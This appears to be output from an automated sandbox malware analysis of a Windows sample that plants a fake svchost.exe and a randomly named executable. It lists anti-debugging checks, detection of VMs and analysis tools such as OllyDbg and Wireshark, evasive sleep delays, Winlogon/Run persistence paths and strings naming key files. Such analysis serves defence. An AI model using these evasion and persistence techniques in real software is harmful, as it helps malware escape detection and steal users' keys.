Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00401DE0 rdtsc

0_2_00401DE0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D17300 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,

2_2_02D17300

Source: C:\Windows\apppatch\svchost.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 3728			Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 6097			Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Evaded block: after key decision	graph_2-82499
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Evaded block: after key decision
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Evaded block: after key decision
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Evaded block: after key decision

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D17430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	2_2_02D17430
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012F7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	4_2_012F7430
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E47430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	5_2_00E47430
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E87430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	8_2_00E87430

Source: C:\Windows\apppatch\svchost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_2-82789

Source: C:\Windows\apppatch\svchost.exe	API coverage: 6.8 %
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	API coverage: 3.6 %
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	API coverage: 2.5 %
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	API coverage: 3.4 %

Source: C:\Windows\apppatch\svchost.exe TID: 5304	Thread sleep count: 3728 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 5304	Thread sleep time: -372800s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 5304	Thread sleep count: 6097 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 5304	Thread sleep time: -609700s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 5248	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D1E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	2_2_02D1E1B0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D2D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	2_2_02D2D638
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D29460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	2_2_02D29460
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D1CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	2_2_02D1CC10
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D07400 PathFileExistsA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	2_2_02D07400
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D2D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	2_2_02D2D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012FE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	4_2_012FE1B0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0130D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	4_2_0130D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E7400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	4_2_012E7400
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012FCC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	4_2_012FCC10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01309460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	4_2_01309460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_0130D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	4_2_0130D638
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E4E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_00E4E1B0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E59460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	5_2_00E59460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E37400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	5_2_00E37400
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E4CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_00E4CC10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E5D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	5_2_00E5D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E5D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	5_2_00E5D638
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001F6B1C FindFirstFileExW,	8_2_001F6B1C
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E8E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_00E8E1B0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E99460 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	8_2_00E99460
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E77400 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	8_2_00E77400
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E8CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_00E8CC10
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E9D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	8_2_00E9D5A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E9D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	8_2_00E9D638

Source: C:\Windows\apppatch\svchost.exe

2_2_02D1D060

Source: C:\Windows\apppatch\svchost.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: vname.key\secrets.keysign.keyjava.exekernel32.dllCreateFileW\explorer.exeGetFileAttributesWuser32.dllGetWindowTextAOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: vmwaretray.exe
Source: svchost.exe, 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllSystemDrivesoftware\microsoft\windows nt\currentversion\winlogon%xsoftware\microsoft\windows\currentversion\runuserinit\\?\globalroot\systemroot\system32\drivers\ntfs.sysntdll.dllRtlUniformkernel32.dllIsWow64Processkernel.dlla
Source: svchost.exe, 00000002.00000002.3271041990.000000000084E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(\|
Source: svchost.exe, 00000002.00000002.3272499451.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747965749.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747965749.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272131517.0000017E5BADA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.3273476779.0000017E5CA68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: name.key\secrets.keysign.keyjava.exekernel32.dllCreateFileW\explorer.exeGetFileAttributesWuser32.dllGetWindowTextAOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: svchost.exe, 00000002.00000002.3271632559.00000000008A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSAFD RfComm [Bluetooth]Hyper-V RAW
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"u]
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000005.00000002.2689193380.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2699960062.0000000001273000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451190552.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2457792742.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000017.00000002.2468559025.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000019.00000002.2472738234.0000000000948000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001B.00000002.2474533950.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000001F.00000002.2483788399.0000000000942000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000022.00000002.2487076508.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\roundwood.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe

Open window title or class name: ollydbg

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
